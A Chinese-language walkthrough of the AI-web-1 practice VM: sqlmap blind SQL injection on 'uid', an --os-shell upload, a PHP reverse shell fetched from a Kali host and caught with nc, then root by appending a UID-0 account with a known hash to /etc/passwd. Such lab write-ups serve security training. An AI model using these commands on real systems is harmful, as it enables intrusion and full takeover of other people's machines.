AI-web-1靶机过关记录
靶机地址:172.16.1.195
Kali地址:172.16.1.107
1、信息收集
端口扫描:
目录扫描:
发现robots.txt敏感文件,查看
存在/m3diNf0/,/se3reTdir777/uploads/。
尝试访问/m3diNf0/,没有权限。扫描/m3diNf0/目录
存在info.php文件,查看
先记下相关信息,继续查看第一次扫描出来的目录。
查看/se3reTdir777/uploads/,没有权限访问。在继续扫描目录后发现,仅有/se3reTdir777/有权限访问
输入1显示
2、漏洞发现与利用
相关敏感信息:
http://172.16.1.195/se3reTdir777//m3diNf0/info.php
注入点:
http://172.16.1.195/se3reTdir777
尝试用SQLmap跑一下注入点
sqlmap -u "http://172.16.1.195/se3reTdir777/" --data "uid=1&Operation=Submit" --level=3 --dbs
注入点:uid
数据库类型:MySQL 5.0.12
注入类型:时间盲注
存在的数据库:[*] aiweb1(当前) [*] information_schema
aiweb1库中的表:user ,systemUser
依次向下:
爆user表中的字段发现firstName、Id、lastName,没有必要继续了
爆systemUser表的字段,没有出来结果
此时,尝试使用SQLmap的--os-shell命令
os-shell执行条件有三个:
网站必须是root权限
网站的绝对路径已知
GPC为off。php主动转义的功能关闭
执行命令:
sqlmap -u "http://172.16.1.195/se3reTdir777/" --data "uid=1&Operation=Submit" --level=3 --os-shell
依次选择PHP、custom location(s)
根据info.php文件暴露的信息,绝对路径选择:
/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/
查看文件权限
反弹shell
另开启一个终端,准备php文件,写入一下内容
Kali开启http.server后,os-shell终端下载到靶机
另一个终端监听端口:nc -lnvp 4444
在os-shell终端上,php执行上传的php文件
获取到反弹的shell
升级为交互式shell:python -c 'import pty;pty.spawn("/bin/bash")'
3、权限提升
网站用户权限,发现可以读取passwd
尝试增加用户,写入passwd
先对密码进行加密
$1$xp$4UEKxIegpvBEuB59Y0qFZ0
写入账号密码:echo 'xp:$1$xp$4UEKxIegpvBEuB59Y0qFZ0/:0:0::/root:/bin/bash'>>/etc/passwd
passwd文件规则:
第一列:账户名称
第二列:密码占位符(x表示该用户需密码登录,为空表示账户无需密码登录)
第三列:用户UID
第四列:GID
第五列:账户附加基本信息(一般存储账户全名称、联系方式等)
第六列:账户家目录位置
第七列:账户登录shell(/bin/bash可登录,/sbin/nologin表示账户无法登录系统)
切换用户
提权成功,拿到用户权限
最新文章
- HTML5学习总结-番外03 Angular Ionic
- 2013 duilib入门简明教程 -- 部分bug 2 (14)
- 深入研究C语言 第二篇(续)
- 【Javascript】IE8兼容 背景图片与a标签的onclick事件
- libvirt-adabddad
- 原生js
- IIS的安装与设置(windows版本)
- 将JavaScript转化为C#
- Centos下出现read-only file system 的解决办法
- 理解javascript中的立即执行函数(function(){})()
- Nagios 系统监控
- Laravel 5.2数据库--多个关联关系,带条件约束的渴求式加载的问题
- C++基类的析构函数定义为虚函数的原因
- 二进制安装mysql
- js设置随机切换背景图片
- mysql免安装版本(用批处理安装和启动)
- CSS——图片替换方法:Fahrner图片替换法(FIR)
- [整理]C语言中字符常量与ASCII码
- 微信小程序 - 选取搜索地点并且显示(map)
- Spring RestTemplate post
热门文章
- UVA - 11426 欧拉函数(欧拉函数表)
- spring-cloud-gateway静态路由
- SpringBoot 集成ehcache
- Synchronized锁机制和ReentrantLock
- 全网独家:成长经历分享 &; 我为什么要写书?
- 《Three.js 入门指南》3.1.2 - 一份整齐的代码结构以及使用ORBIT CONTROLS插件(轨道控制)实现模型控制
- Linux命令 dos2unix 的实际应用场景
- Shell:Day02.笔记
- mysql服务器内存使用情况总结
- SpringMVC(六):分层整合SSM